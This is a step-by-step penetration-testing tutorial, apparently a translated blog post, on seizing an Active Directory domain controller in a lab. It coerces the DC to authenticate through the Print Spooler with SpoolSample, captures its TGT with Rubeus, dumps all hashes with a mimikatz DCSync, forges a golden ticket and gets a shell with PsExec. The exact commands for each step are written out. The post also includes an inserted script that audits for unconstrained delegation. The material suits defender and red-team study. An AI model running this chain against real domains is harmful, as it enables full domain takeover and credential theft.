Using unconstrained delegation + the Spooler printer service to create golden tickets to attack domain controllers

Foreword

Following the previous article -> Domain penetration: the principle and exploitation of unconstrained delegation attacks. In practice, waiting for an administrator to actively connect to a host with plain unconstrained delegation is unreliable. Therefore, unconstrained delegation + the Spooler printer service can be used to force the specified host to connect.

Exploitation principle: the Windows Print System Remote Protocol (MS-RPRN) is an old but enabled-by-default mechanism in which a domain user can call the MS-RPRN RpcRemoteFindFirstPrinterChangeNotification(Ex) method to force any computer running the Spooler service to authenticate to a target of the attacker's choosing via Kerberos or NTLM.

Note: the Spooler service is running by default.

Attack process

  • Domain: test.lab
  • Domain controller: 192.168.10.2 win2012, account administrator, hostname DC
  • Domain host: 192.168.10.5 win7, account yuwin7, hostname admin-PC

The attacker controls a host account with unconstrained delegation enabled. When the domain controller is running the Print Spooler service, the attacker can force the domain controller to authenticate to that host, and then obtain the TGT of the DC.

  • Take control of a host (host account) with Kerberos unconstrained delegation
  • Find a DC running the Print Spooler service (autostart and SYSTEM privileges by default)
  • Run Rubeus in monitor mode as administrator
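The first prerequisite above, a host trusted for unconstrained delegation, is also what a defender should be auditing for. The following check is an added example, not code from the original post: it flags accounts whose userAccountControl carries the TRUSTED_FOR_DELEGATION bit, skips domain controllers (which carry the flag by design), and lists sensitive accounts that lack the "cannot be delegated" protection. The sample records are constructed to mimic LDAP attributes for the lab in this post; in practice they would come from an LDAP query of the domain.

```python
# Audit helper (added example, not from the original post). The input records
# are constructed; real ones would be read from LDAP (userAccountControl,
# primaryGroupID and sAMAccountName attributes).

TRUSTED_FOR_DELEGATION = 0x80000   # userAccountControl bit: unconstrained delegation
NOT_DELEGATED = 0x100000           # "Account is sensitive and cannot be delegated"
DOMAIN_CONTROLLERS_RID = 516       # primaryGroupID of writable domain controllers
RODC_RID = 521                     # primaryGroupID of read-only domain controllers


def unconstrained_delegation_accounts(records, include_dcs=False):
    """Return account names trusted for unconstrained delegation.

    Domain controllers carry the flag by design, so they are skipped unless
    include_dcs is set; any other account with the flag is a finding.
    """
    findings = []
    for r in records:
        uac = r.get("userAccountControl", 0)
        if not uac & TRUSTED_FOR_DELEGATION:
            continue
        is_dc = r.get("primaryGroupID") in (DOMAIN_CONTROLLERS_RID, RODC_RID)
        if is_dc and not include_dcs:
            continue
        findings.append(r["sAMAccountName"])
    return findings


def sensitive_accounts_not_protected(records, sensitive):
    """Return sensitive accounts (e.g. admins) missing the NOT_DELEGATED bit."""
    return [r["sAMAccountName"] for r in records
            if r["sAMAccountName"] in sensitive
            and not r.get("userAccountControl", 0) & NOT_DELEGATED]


# Constructed sample loosely matching the lab (0x2000 = server trust account,
# 0x1000 = workstation trust account, 0x200 = normal user account).
SAMPLE = [
    {"sAMAccountName": "DC$", "userAccountControl": 0x82000, "primaryGroupID": 516},
    {"sAMAccountName": "ADMIN-PC$", "userAccountControl": 0x81000, "primaryGroupID": 515},
    {"sAMAccountName": "FILESRV$", "userAccountControl": 0x1000, "primaryGroupID": 515},
    {"sAMAccountName": "administrator", "userAccountControl": 0x200, "primaryGroupID": 513},
    {"sAMAccountName": "svc_backup", "userAccountControl": 0x100200, "primaryGroupID": 513},
]

if __name__ == "__main__":
    print("unconstrained delegation:", unconstrained_delegation_accounts(SAMPLE))
    print("sensitive but delegatable:",
          sensitive_accounts_not_protected(SAMPLE, {"administrator", "svc_backup"}))
```

Anything returned by the first function outside the DC set is a host that can collect forwarded TGTs exactly as described in this post; Protected Users membership or the NOT_DELEGATED bit on privileged accounts limits what such a host can harvest.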

Rubeus monitoring

Run Rubeus as a local administrator on win7

Rubeus.exe monitor /interval:1 /filteruser:DC$
# Rubeus monitors for Event ID 4624 logon events, so the domain controller's TGT is captured as soon as it arrives
# /interval:1 sets the monitoring interval to 1 second
# /filteruser sets the monitored account to our domain controller; note the trailing $. If no filter is set, all TGTs are captured

Use the print service to force the domain controller to authenticate to the local machine

Execute the following:

spoolsample.exe DC admin-PC
# Uses the print service to force the domain controller to authenticate to the admin-PC host, so that Rubeus can capture the TGT

At this point Rubeus has received the TGT.

Extract TGT

First copy the base64 of the TGT captured by Rubeus. Rubeus prints it with a newline at the end of each line, so we use this Python script to remove the newline characters:

# Join the base64 TGT lines from 1.txt into a single line and save it to 2.txt
data = ""
with open('1.txt', 'r') as src:
    for line in src:
        data += line.strip()   # drop the newline (and any trailing whitespace)
print(data)
with open("2.txt", 'a') as f:
    f.write(data)
print('Saved')

Then use PowerShell to convert the base64 string directly into a normal TGT file:

[IO.File]::WriteAllBytes("<absolute path>\ticket.kirbi", [Convert]::FromBase64String("<base64 TGT>"))

Inject the TGT into the current session and export the hashes of all users from the domain controller

Run mimikatz as a domain user:

kerberos::ptt ticket.kirbi
lsadump::dcsync /domain:test.lab /all /csv

Note that the TGT obtained here cannot be regarded as a golden ticket: the authority it grants is only the domain controller's own local administrative authority, so we cannot connect to the domain controller with it. It is, however, enough to obtain the hashes of all users, and from those we can make a real golden ticket.

Make a golden ticket

Since we now have the krbtgt user's NTLM hash, we can use it to generate a golden ticket.

  1. Get the SID of this account

Execute whoami /user locally; note that the trailing digits after the last hyphen of the SID (the account's RID) are not needed.

  2. Make the ticket

mimikatz "kerberos::golden /domain:test.lab /sid:S-1-5-21-587556175-550635965-2643831430 /krbtgt:6412c19ffa5a50cd63fe27917ef83f54 /user:administrator /ticket:ntlm.kirbi" "exit"

  3. Inject the ticket

mimikatz "kerberos::purge" "kerberos::ptt ntlm.kirbi"

You can now connect to the domain controller.

We can also use PsExec directly to get a shell; because the golden ticket is injected, no username and password are required.

PsExec64.exe \\dc cmd -accepteula

Origin juejin.im/post/7085286428300541983